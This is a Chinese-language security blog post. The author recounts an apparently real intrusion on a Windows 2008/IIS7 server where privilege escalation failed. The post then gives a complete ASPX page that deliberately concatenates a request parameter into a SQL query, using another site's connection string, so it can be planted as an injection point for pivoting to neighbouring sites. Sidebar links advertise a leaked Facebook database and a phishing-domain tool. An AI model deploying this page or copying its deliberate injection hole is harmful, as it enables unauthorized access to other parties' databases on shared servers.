关注我们
QRcode 邮件联系 QRcode
主页 » 信息安全 » 正文

利用aspx构造注射来跨站

 feng  949 ℃  0条点评

昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。

其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。

代码量不多,自己写个拉倒了。烦死了。
作者:xxser

01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title>暗影aspx构造注射专用页面</title>
</head>
<body>
    <form id="form1" runat="server">
    <div>
     <script language="c#" runat="server">
            
         void page_init(object sender, EventArgs e)
         {
             
             System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
             
             conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
             conn.Open();
             
             string i =  this.Page.Request.Params["xxser"];  //这里是参数?xxser=1
             
             System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
             int x = command.ExecuteNonQuery();
             Response.Write(i+"\n");
             Response.Write(x);
             conn.Close();
         }
     
      </script>
    </div>
    </form>
</body>
</html>
本文标签:
社交网站Facebook数据库下载 2.8G
巧进非诚勿扰—飘柔“爱转角”网站后台
Joy:一款用于捕获和分析网络内部流量数据的工具Joy:一款用于捕获和分析网络内部流量数据的工具One-Lin3r:懒人的福音,渗透测试单行化工具One-Lin3r:懒人的福音,渗透测试单行化工具EvilURL v2.0一个生成用于钓鱼攻击的IDN域名的工具EvilURL v2.0一个生成用于钓鱼攻击的IDN域名的工具国产网站恶意代码监测(网马监控)工具优化版国产网站恶意代码监测(网马监控)工具优化版

已有0条评论,欢迎点评!

smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley

国际惯例, 沙发拿下 . . .


注册帐号  |  忘记密码